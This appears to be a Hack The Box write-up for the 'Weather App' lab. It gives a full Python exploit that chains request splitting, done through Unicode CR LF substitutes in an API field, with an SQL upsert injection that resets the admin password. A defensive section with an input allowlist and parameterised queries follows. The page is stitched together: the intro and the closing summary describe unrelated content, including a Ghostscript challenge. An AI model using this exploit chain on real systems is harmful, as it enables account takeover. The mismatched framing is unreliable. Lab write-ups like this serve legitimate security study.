HackTheBox Weather App Writeup
Explore the basics of cybersecurity in the Weather App Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.
import sys
import requests


def get_base_url():
    # The target is given on the command line as <ip:port>; the site root is
    # built from it and the individual routes (/api/weather, /login) are
    # appended below, so the root itself carries no path component.
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    host, port = sys.argv[1].split(':')
    return f"http://{host}:{port}"


def encode_special_chars(value):
    # Space, single quote and double quote are replaced by the code points
    # U+0120, U+0127 and U+0122 so that the values survive the server's
    # request handling and arrive at /register as the intended characters.
    return value.replace(" ", "\u0120").replace("'", "\u0127").replace('"', "\u0122")


BASE_URL = get_base_url()
url = f'{BASE_URL}/api/weather'

host = "127.0.0.1"
username = 'admin'
password = "111') ON CONFLICT (username) DO UPDATE SET password='1234';--"

parsed_username = encode_special_chars(username)
parsed_password = encode_special_chars(password)
# Body length of the embedded POST /register request; each substituted code
# point ends up as a single byte on the wire, so len() gives the right count.
content_length = len(parsed_username) + len(parsed_password) + len("username=&password=")

# The "endpoint" value is spliced into the outbound request the weather API
# makes to its upstream. U+010D U+010A stand in for CR LF, which lets a second
# request (POST /register, normally reachable only from localhost) follow the
# first one; the trailing "GET " absorbs the rest of the server's own request.
endpoint = (
    f"{host}/\u0120HTTP/1.1\u010D\u010A"
    f"HOST:\u0120{host}\u010D\u010A"
    f"Content-Length:\u01200\u010D\u010A\u010D\u010A"
    f"POST\u0120/register\u0120HTTP/1.1\u010D\u010A"
    f"HOST:\u0120{host}\u010D\u010A"
    f"Content-Type:\u0120application/x-www-form-urlencoded\u010D\u010A"
    f"Content-Length:\u0120{content_length}\u010D\u010A\u010D\u010A"
    f"username={parsed_username}&password={parsed_password}\u010D\u010A\u010D\u010A"
    f"GET\u0120"
)

data = {
    "endpoint": endpoint,
    "city": "MyCity",
    "country": "MyCountryCode"
}

response = requests.post(url, json=data)
print("SSRF Exploit Response:")
print(response.text)

# The upsert in the password field has reset the admin password to 1234;
# logging in with it returns the page that carries the flag.
login_url = f'{BASE_URL}/login'
login_data = {
    "username": "admin",
    "password": "1234"
}

flag_response = requests.post(login_url, data=login_data)
print("Flag Retrieval Response:")
print(flag_response.text)
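The script above abuses two sinks: the "endpoint" field, which the service splices into an outbound HTTP request, and the registration query, which is built from user input. The following is an added defensive example, not code from the writeup or from the challenge itself; the route names and the sqlite3 schema are assumptions made to keep the example self-contained. It shows the two checks that close both sinks: a strict host[:port] grammar that rejects the smuggled request (non-ASCII code points, CR, LF and path characters all fail), and a parameterised insert that stores the upsert-shaped password string as plain data instead of executing it.

```python
import re
import sqlite3

# Hostname or IPv4 literal with an optional port, nothing else. Used with
# fullmatch(), so no anchors are needed and a trailing newline cannot slip by.
_ENDPOINT_RE = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?(?::\d{1,5})?")


def is_safe_endpoint(value: str) -> bool:
    """Accept only a plain host[:port] token for the upstream weather request.

    Rejects anything outside ASCII (which covers the U+0120 / U+010D / U+010A
    substitutions the script relies on), plus CR, LF, spaces and paths.
    """
    if not value.isascii():
        return False
    return _ENDPOINT_RE.fullmatch(value) is not None


def register_user(conn: sqlite3.Connection, username: str, password: str) -> None:
    """Insert a user with a parameterised statement: the inputs are bound as
    data, so quotes, ON CONFLICT clauses and comment markers never reach the
    SQL parser. (Hashing of the stored password is outside this example.)"""
    conn.execute(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        (username, password),
    )
    conn.commit()


def password_for(conn: sqlite3.Connection, username: str):
    row = conn.execute(
        "SELECT password FROM users WHERE username = ?", (username,)
    ).fetchone()
    return row[0] if row else None


def demo() -> dict:
    # Constructed inputs mirroring the shapes used in the script above.
    smuggled = "127.0.0.1/\u0120HTTP/1.1\u010D\u010AHOST:\u0120127.0.0.1"
    results = {
        "plain host accepted": is_safe_endpoint("api.openweathermap.org"),
        "host with port accepted": is_safe_endpoint("127.0.0.1:8080"),
        "smuggled request rejected": not is_safe_endpoint(smuggled),
        "raw crlf rejected": not is_safe_endpoint("127.0.0.1\r\nHOST: x"),
        "path rejected": not is_safe_endpoint("127.0.0.1/register"),
    }

    # Assumed schema for the users table (in-memory sqlite3 for the demo).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    register_user(conn, "admin", "s3cret")

    # The same upsert-shaped string the script sends, supplied as a parameter.
    injected = "111') ON CONFLICT (username) DO UPDATE SET password='1234';--"
    register_user(conn, "mallory", injected)
    results["admin password unchanged"] = password_for(conn, "admin") == "s3cret"
    results["payload stored literally"] = password_for(conn, "mallory") == injected
    conn.close()
    return results


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'ok' if ok else 'FAIL'}")
```

The allowlist grammar is deliberately narrower than what a URL parser would accept: the point is that the value is a host to connect to, not a fragment of request text, so anything that is not a host is rejected before a request line is ever assembled. The parameterised insert makes the second half of the chain moot even if the registration route were reachable.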
Summary
PetPet Rcbee leverages a vulnerability in Ghostscript 9.23 to execute arbitrary commands through a crafted PostScript payload. The exploit is uploaded via an API, enabling the attacker to copy the flag to a publicly accessible directory for retrieval.
This post is licensed under CC BY 4.0 by the author.